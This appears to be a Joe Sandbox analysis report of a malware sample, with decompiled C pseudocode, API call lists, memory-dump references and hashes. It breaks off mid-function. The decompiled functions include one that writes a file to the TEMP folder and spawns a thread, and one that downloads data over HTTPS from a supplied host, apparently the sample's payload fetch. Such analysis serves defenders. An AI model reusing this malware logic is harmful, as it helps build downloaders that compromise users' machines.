                                                                                                                                                                                                                                                                                          0x040071e0
                                                                                                                                                                                                                                                                                          0x040071e5
                                                                                                                                                                                                                                                                                          0x040071e8
                                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                                          0x040071fe
                                                                                                                                                                                                                                                                                          0x04007212
                                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                                          0x04007231
                                                                                                                                                                                                                                                                                          0x04007236
                                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x04006e1b
                                                                                                                                                                                                                                                                                          0x04006e22
                                                                                                                                                                                                                                                                                          0x04006e29
                                                                                                                                                                                                                                                                                          0x04006e39
                                                                                                                                                                                                                                                                                          0x04006eec
                                                                                                                                                                                                                                                                                          0x04006ef1
                                                                                                                                                                                                                                                                                          0x04006ef4
                                                                                                                                                                                                                                                                                          0x04006e3f
                                                                                                                                                                                                                                                                                          0x04006e4f
                                                                                                                                                                                                                                                                                          0x04006e65
                                                                                                                                                                                                                                                                                          0x04006e6c
                                                                                                                                                                                                                                                                                          0x04006e8c
                                                                                                                                                                                                                                                                                          0x04006e92
                                                                                                                                                                                                                                                                                          0x04006e97
                                                                                                                                                                                                                                                                                          0x04006e9a
                                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                                          0x04006ebb
                                                                                                                                                                                                                                                                                          0x04006eca
                                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                                          0x04006ee3
                                                                                                                                                                                                                                                                                          0x04006efb
                                                                                                                                                                                                                                                                                          0x04007012
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006f01
                                                                                                                                                                                                                                                                                          0x04006f08
                                                                                                                                                                                                                                                                                          0x04006f1c
                                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                                          0x04006f2d
                                                                                                                                                                                                                                                                                          0x04006f35
                                                                                                                                                                                                                                                                                          0x04006f3a
                                                                                                                                                                                                                                                                                          0x04006f3d
                                                                                                                                                                                                                                                                                          0x04006f49
                                                                                                                                                                                                                                                                                          0x04006f55
                                                                                                                                                                                                                                                                                          0x04006f83
                                                                                                                                                                                                                                                                                          0x04006f8b
                                                                                                                                                                                                                                                                                          0x04006fa1
                                                                                                                                                                                                                                                                                          0x04006fa6
                                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                                          0x04006f57
                                                                                                                                                                                                                                                                                          0x04006f5d
                                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                                          0x04006fc6
                                                                                                                                                                                                                                                                                          0x04006fcf
                                                                                                                                                                                                                                                                                          0x04006fe9
                                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                                          0x04006fff
                                                                                                                                                                                                                                                                                          0x0400700a
                                                                                                                                                                                                                                                                                          0x0400700f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006fff

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                                          • Opcode ID: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                          • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E008111F0(void* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                                                                                                                          				intOrPtr _v57;
                                                                                                                                                                                                                                                                                          				intOrPtr _v58;
                                                                                                                                                                                                                                                                                          				intOrPtr _v59;
                                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                                          				intOrPtr _v61;
                                                                                                                                                                                                                                                                                          				intOrPtr _v62;
                                                                                                                                                                                                                                                                                          				intOrPtr _v63;
                                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                                                                                                                          				void _v84;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v268;
                                                                                                                                                                                                                                                                                          				char _v424;
                                                                                                                                                                                                                                                                                          				void _v428;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v580;
                                                                                                                                                                                                                                                                                          				void _v584;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v588;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t88;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				signed char _t103;
                                                                                                                                                                                                                                                                                          				int _t114;
                                                                                                                                                                                                                                                                                          				signed char _t115;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t171;
                                                                                                                                                                                                                                                                                          				int _t172;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          				signed int _t175;
                                                                                                                                                                                                                                                                                          				void* _t176;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t83 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t83 ^ _t175;
                                                                                                                                                                                                                                                                                          				_t174 = __ecx;
                                                                                                                                                                                                                                                                                          				_v428 = 0x154;
                                                                                                                                                                                                                                                                                          				E00816820( &_v424, 0, 0x150);
                                                                                                                                                                                                                                                                                          				_t177 = _t176 + 0xc;
                                                                                                                                                                                                                                                                                          				if(SystemParametersInfoA(0x29, 0x154,  &_v428, 0) == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					_t88 =  *(_t174 + 4);
                                                                                                                                                                                                                                                                                          					_v588 = _t88;
                                                                                                                                                                                                                                                                                          					_t171 = GetWindowDC(_t88);
                                                                                                                                                                                                                                                                                          					_t91 = SelectObject(_t171,  *(_t174 + 0xa4));
                                                                                                                                                                                                                                                                                          					_v24.left = 0;
                                                                                                                                                                                                                                                                                          					_v24.top = 0;
                                                                                                                                                                                                                                                                                          					_v24.right = 0;
                                                                                                                                                                                                                                                                                          					_v24.bottom = 0;
                                                                                                                                                                                                                                                                                          					_t139 = DrawTextA;
                                                                                                                                                                                                                                                                                          					_v584 = _t91;
                                                                                                                                                                                                                                                                                          					DrawTextA(_t171, "\t", 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          					if(_v24.right - _v24.left >= 4) {
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xb0) = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						SetRectEmpty( &_v24);
                                                                                                                                                                                                                                                                                          						DrawTextA(_t171, "x", 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xb0) = _v24.right - _v24.left;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					SelectObject(_t171, _v584);
                                                                                                                                                                                                                                                                                          					_v580.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          					E00816820( &(_v580.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          					GetVersionExA( &_v580);
                                                                                                                                                                                                                                                                                          					if(_v580.dwMajorVersion < 5) {
                                                                                                                                                                                                                                                                                          						L42:
                                                                                                                                                                                                                                                                                          						return E008159E6(ReleaseDC(_v588, _t171), _t139, _v8 ^ _t175, _v588, _t171, _t174);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v584 = 1;
                                                                                                                                                                                                                                                                                          						if(SystemParametersInfoA(0x100a, 0,  &_v584, 0) == 0 || _v584 != 0) {
                                                                                                                                                                                                                                                                                          							_t103 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t103 = 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0x85) = (_t103 & 0x00000001 | 0x00000004) + (_t103 & 0x00000001 | 0x00000004) |  *(_t174 + 0x85) & 0x000000fd;
                                                                                                                                                                                                                                                                                          						E00811600( !(((_t103 & 0x00000001 | 0x00000004) + (_t103 & 0x00000001 | 0x00000004) |  *(_t174 + 0x85) & 0x000000fd) >> 1) & 0x00000001, _t174);
                                                                                                                                                                                                                                                                                          						if(_v580.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                          							if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          								goto L42;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L37;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_v580.dwMinorVersion >= 1) {
                                                                                                                                                                                                                                                                                          								L37:
                                                                                                                                                                                                                                                                                          								_v584 = 0;
                                                                                                                                                                                                                                                                                          								_t114 = SystemParametersInfoA(0x1022, 0,  &_v584, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _t114;
                                                                                                                                                                                                                                                                                          								if(_t114 == 0) {
                                                                                                                                                                                                                                                                                          									L40:
                                                                                                                                                                                                                                                                                          									_t115 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                                                                          									L41:
                                                                                                                                                                                                                                                                                          									_t79 = _t174 + 0x85;
                                                                                                                                                                                                                                                                                          									 *_t79 =  *(_t174 + 0x85) ^ ( *(_t174 + 0x85) ^ _t115) & 0x00000001;
                                                                                                                                                                                                                                                                                          									__eflags =  *_t79;
                                                                                                                                                                                                                                                                                          									goto L42;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _v584;
                                                                                                                                                                                                                                                                                          								if(_v584 == 0) {
                                                                                                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t115 = 1;
                                                                                                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L42;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v84 = 0;
                                                                                                                                                                                                                                                                                          				E00816820( &_v80, 0, 0x38);
                                                                                                                                                                                                                                                                                          				_t121 =  *(_t174 + 0xa4);
                                                                                                                                                                                                                                                                                          				_t177 = _t177 + 0xc;
                                                                                                                                                                                                                                                                                          				if(_t121 != 0) {
                                                                                                                                                                                                                                                                                          					GetObjectA(_t121, 0x3c,  &_v84);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_v84 != _v268.lfHeight || _v80 != _v268.lfWidth || _v76 != _v268.lfEscapement || _v72 != _v268.lfOrientation || _v68 != _v268.lfWeight || _v64 != _v268.lfItalic || _v63 != _v268.lfUnderline || _v62 != _v268.lfStrikeOut || _v61 != _v268.lfCharSet || _v60 != _v268.lfOutPrecision || _v59 != _v268.lfClipPrecision || _v58 != _v268.lfQuality || _v57 != _v268.lfPitchAndFamily || lstrcmpA( &_v56,  &(_v268.lfFaceName)) != 0) {
                                                                                                                                                                                                                                                                                          					_t172 = CreateFontIndirectA( &_v268);
                                                                                                                                                                                                                                                                                          					if(_t172 != 0) {
                                                                                                                                                                                                                                                                                          						if( *(_t174 + 0xa4) != 0 && DeleteObject( *(_t174 + 0xa4)) != 0) {
                                                                                                                                                                                                                                                                                          							 *(_t174 + 0xa4) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t123 =  *(_t174 + 0xa4);
                                                                                                                                                                                                                                                                                          						if(_t123 != 0 && _t123 != _t172) {
                                                                                                                                                                                                                                                                                          							DeleteObject(_t123);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xa4) = _t172;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x30, _t172, 1);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x41c, 0, "NS");
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x421, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L25;
                                                                                                                                                                                                                                                                                          			}











































                                                                                                                                                                                                                                                                                          0x008111f9
                                                                                                                                                                                                                                                                                          0x00811200
                                                                                                                                                                                                                                                                                          0x00811215
                                                                                                                                                                                                                                                                                          0x00811217
                                                                                                                                                                                                                                                                                          0x00811221
                                                                                                                                                                                                                                                                                          0x00811226
                                                                                                                                                                                                                                                                                          0x00811240
                                                                                                                                                                                                                                                                                          0x0081139b
                                                                                                                                                                                                                                                                                          0x0081139b
                                                                                                                                                                                                                                                                                          0x0081139f
                                                                                                                                                                                                                                                                                          0x008113ab
                                                                                                                                                                                                                                                                                          0x008113b5
                                                                                                                                                                                                                                                                                          0x008113cb
                                                                                                                                                                                                                                                                                          0x008113ce
                                                                                                                                                                                                                                                                                          0x008113d1
                                                                                                                                                                                                                                                                                          0x008113d4
                                                                                                                                                                                                                                                                                          0x008113d7
                                                                                                                                                                                                                                                                                          0x008113de
                                                                                                                                                                                                                                                                                          0x008113e4
                                                                                                                                                                                                                                                                                          0x008113ef
                                                                                                                                                                                                                                                                                          0x0081141c
                                                                                                                                                                                                                                                                                          0x008113f1
                                                                                                                                                                                                                                                                                          0x008113f5
                                                                                                                                                                                                                                                                                          0x0081140c
                                                                                                                                                                                                                                                                                          0x00811414
                                                                                                                                                                                                                                                                                          0x00811414
                                                                                                                                                                                                                                                                                          0x0081142e
                                                                                                                                                                                                                                                                                          0x00811442
                                                                                                                                                                                                                                                                                          0x0081144c
                                                                                                                                                                                                                                                                                          0x0081145b
                                                                                                                                                                                                                                                                                          0x0081146a
                                                                                                                                                                                                                                                                                          0x00811521
                                                                                                                                                                                                                                                                                          0x0081153f
                                                                                                                                                                                                                                                                                          0x00811470
                                                                                                                                                                                                                                                                                          0x00811480
                                                                                                                                                                                                                                                                                          0x00811492
                                                                                                                                                                                                                                                                                          0x008114a1
                                                                                                                                                                                                                                                                                          0x008114a1
                                                                                                                                                                                                                                                                                          0x0081149d
                                                                                                                                                                                                                                                                                          0x0081149d
                                                                                                                                                                                                                                                                                          0x0081149d
                                                                                                                                                                                                                                                                                          0x008114b4
                                                                                                                                                                                                                                                                                          0x008114c0
                                                                                                                                                                                                                                                                                          0x008114ce
                                                                                                                                                                                                                                                                                          0x008114db
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008114d0
                                                                                                                                                                                                                                                                                          0x008114d7
                                                                                                                                                                                                                                                                                          0x008114dd
                                                                                                                                                                                                                                                                                          0x008114ed
                                                                                                                                                                                                                                                                                          0x008114f7
                                                                                                                                                                                                                                                                                          0x008114fd
                                                                                                                                                                                                                                                                                          0x008114ff
                                                                                                                                                                                                                                                                                          0x0081150e
                                                                                                                                                                                                                                                                                          0x0081150e
                                                                                                                                                                                                                                                                                          0x0081150e
                                                                                                                                                                                                                                                                                          0x00811510
                                                                                                                                                                                                                                                                                          0x0081151b
                                                                                                                                                                                                                                                                                          0x0081151b
                                                                                                                                                                                                                                                                                          0x0081151b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081151b
                                                                                                                                                                                                                                                                                          0x00811501
                                                                                                                                                                                                                                                                                          0x00811508
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081150a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081150a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008114d9
                                                                                                                                                                                                                                                                                          0x008114ce
                                                                                                                                                                                                                                                                                          0x0081146a
                                                                                                                                                                                                                                                                                          0x0081124d
                                                                                                                                                                                                                                                                                          0x00811250
                                                                                                                                                                                                                                                                                          0x00811255
                                                                                                                                                                                                                                                                                          0x0081125b
                                                                                                                                                                                                                                                                                          0x00811260
                                                                                                                                                                                                                                                                                          0x00811269
                                                                                                                                                                                                                                                                                          0x00811269
                                                                                                                                                                                                                                                                                          0x00811278
                                                                                                                                                                                                                                                                                          0x0081132c
                                                                                                                                                                                                                                                                                          0x00811330
                                                                                                                                                                                                                                                                                          0x00811338
                                                                                                                                                                                                                                                                                          0x0081134b
                                                                                                                                                                                                                                                                                          0x0081134b
                                                                                                                                                                                                                                                                                          0x00811351
                                                                                                                                                                                                                                                                                          0x00811359
                                                                                                                                                                                                                                                                                          0x00811360
                                                                                                                                                                                                                                                                                          0x00811360
                                                                                                                                                                                                                                                                                          0x00811369
                                                                                                                                                                                                                                                                                          0x0081137b
                                                                                                                                                                                                                                                                                          0x0081138c
                                                                                                                                                                                                                                                                                          0x00811399
                                                                                                                                                                                                                                                                                          0x00811399
                                                                                                                                                                                                                                                                                          0x00811330
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00811221
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000029,00000154,00000154,00000000), ref: 00811238
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00811250
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 00811269
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00811315
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00811326
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00811341
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00811360
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0081137B
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0081138C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00811399
                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(?,?,?,?), ref: 008113A5
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 008113B5
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00822C38,000000FF,?,00000424), ref: 008113E4
                                                                                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 008113F5
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00822C3C,000000FF,?,00000424), ref: 0081140C
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0081142E
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0081144C
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(00000094,?,?,?,?,?,?), ref: 0081145B
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(0000100A,00000000,?,00000000), ref: 0081148A
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00001022,00000000,00000001,00000000), ref: 008114F7
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00811529
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$InfoMessageParametersSendSystem_memset$DeleteDrawSelectText$CreateEmptyFontIndirectRectReleaseVersionWindowlstrcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3152644950-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a3b9e164d6f61cb74035bc913cb4fc3c07dc7f648392a50e447e3cae19fdce1a
                                                                                                                                                                                                                                                                                          • Instruction ID: ab94cb7e186ac0d2610f95f399cab5203c57ed053e87686198f74db7be99cb18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b9e164d6f61cb74035bc913cb4fc3c07dc7f648392a50e447e3cae19fdce1a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97A181719002589BDF20DBA4CC88BEEBBBEFF55700F504498E29AE7641D77459C5CB21
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                                          				void _v296;
                                                                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                                                                          				long _v304;
                                                                                                                                                                                                                                                                                          				long _v308;
                                                                                                                                                                                                                                                                                          				char* _t54;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                                          					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                                          								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                                          								_v24 = 4;
                                                                                                                                                                                                                                                                                          								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                                          								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                                          								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                                          								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          									_v308 = GetLastError();
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                                          									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                                          										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                                          											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                                          											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										break;
